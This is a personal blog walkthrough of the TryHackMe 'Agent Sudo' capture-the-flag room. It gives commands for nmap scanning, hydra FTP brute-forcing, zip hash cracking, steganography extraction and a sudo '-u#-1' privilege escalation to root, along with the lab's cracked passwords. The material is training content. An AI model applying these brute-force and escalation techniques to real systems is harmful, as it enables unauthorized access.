Well, well, well…here we are and I’m so excited to finally put down something here. Initially, I’ve been so lazy to write an article on Medium; then I realized its importance to the community since I’ve also benefited greatly from reading other people’s content.
In this article I’ll walk you through the process I took to solve this challenge and gain root access to a machine. I’ll try to make it as simple as possible for us, the newbies. It’s an easy challenge by the way, but not as easy as they sayy.
I’ll try to break it down just as I went through the process, the ups and downs included. That being said, do me the honors.
Challenge name: Agent Sudo
Platform: Tryhackme
Category: Easy
Task 1
The first task involves deploying the machine. After deploying the machine, you can connect to it using the attack box or via OpenVPN.
In order to communicate with the machine, you’ll need to be on the same network. OpenVPN helped me with that since the attack box has a limited time for those not subscribed.
Task 2
Since the machine is accessible over the network, the next step is to enumerate ports and services running on the target. And for that, I used nmap( a very useful penetration testing tool).
The command I used to enumerate the open ports and services running on the machine is:
nmap -A ipaddress
As can be seen in the screenshot below, there were three open ports: 21,22 and 80 representing ftp, ssh, and http.
port 80 being open means it can be accessed via a web browser. It’s basically a website. You can see the result of pasting the IP on a web browser.
Seems the site is hidden and can be accessed by a code name. I actually looked at the hint and had to change my user agent from Mozilla Firefox to C. On firefox, I downloaded the user-agent switcher extension. That did the job for me and got me to this page.
I’ve found one user name and that’s chris. I also did some sub-directory discovery with ffuf, but couldn’t find any sub-directories.
And so I proceeded to other services: ftp(file transfer protocol). If you don’t know what that means, I’m not telling you either. Ask google.😄
Unfortunately, FTP does not support anonymous login because I tried it and it didn’t work. But we could try brute forcing the login since we’ve found one user name. For brute forcing ftp, I used hydra.
hydra -l chris -P password_list.txt IP ftp
I used the -l flag since I already had a user name, else I would have used -L. The same goes for the -P where I provided hydra with a password list.
From the picture, I used a 7-character password list cos I figured the password had 7 characters. I did this by writing a simple python script that takes a password list and prints out the ones with a given number of characters.
That way, I can save time while using hydra.
Okay, we’ve found the password crystal. That’s a weak one, but it’s common and normal. Next, I logged into ftp simply by:
ftp IP_addr
We’re logged in after being prompted for the username and password. The are some files present, two pictures and a text To_agent_J. On the ftp server, I used the get file to successfully download the files.
We get a message from agent C to agent J. From the message Agent C seems to be pointing to a picture.
We go back to check the picture for hidden messages(steganography). For this I used binwalk.
binwalk -e cutie.pgn
You can see a hidden zip file there with some other blah blah blah that I didn’t want to care about. I was able to extract it with the command above only to discover it was a passworded zip file(8702.zip). Luckily, johntheRipper’s there to do the heavy lifting.
First thing’s to use ziptojohn to get the password hash, then john to crack the hashes.
zip2john 8702.zip > ziphash
john ziphash
I’m getting tired of screenshotting…. just so many picturesssssssss and I’m hungry!
So we get a password, “alien”. But how does that help my life. I remember trying unzip and tar to unzip the file but it didn’t work. Didn’t know why then I googled the error it gave me. From the result, I found 7z to be the perfect tool for it.
7z x 8702.zip
I was prompted to input a password and successfully extracted a message To_agentR.txt. It had a message with some seemingly encoded text. And though I’m not good at cryptography, I tried an online base64 decoder.
note: I’ll appreciate any form of assistance with cryptography..thank you, thank you.
At first, I didn’t know what to do with the password I got. I tried using binwalk with the other picture I found from the ftp server, but got nothing. I also tried stegsnow, yet nothing. Later I discovered steghide. I also discovered stegcracker.
Normally, I would have tried steghide, but stegcracker seemed way easier to use. So why not? Maybe you should go check steghide yourself.
Then we get another message, this time to james(another user) and from chris. The message also contains the password “hackerrules!”
The next possible thing to think of is to use these details to log in via ssh. And it worked. Upon logging in as james, you find a user.txt flag and an image.
ssh username@IP
then the command
scp james@IPaddr:/home/james/Alien_autospy.jpg Path_you_want_to_download_to
I used google image search, and FoxNews to find the incident of the photo as “Roswell alien autopsy”
Now we’re left with escalating our privilege to become a root user. Running sudo -l gives us “(ALL, !root) /bin/bash”
Google searching the exploit for this lands me on this page.
Running sudo -u#-1 /bin/bash gives me root access to the machine. Next is to navigate to the root directory. And voila, you find the root.txt file. Open it to find the name of that troublesome agent and the flag. I’m not pasting the flag here, lol. Just use google lens to do that.
Another thing, go to /var/www/html/ and create a file called hacked or anything of your choice. Write whatever you want there. You’ve successfully rooted the machine. Gracias!
This was a long one. I was also tired. Hopefully, you didn’t reach the end of the article. If you did, kudos! If you found the article interesting, don’t follow. Yes, don’t follow me. However, I still appreciate your comments.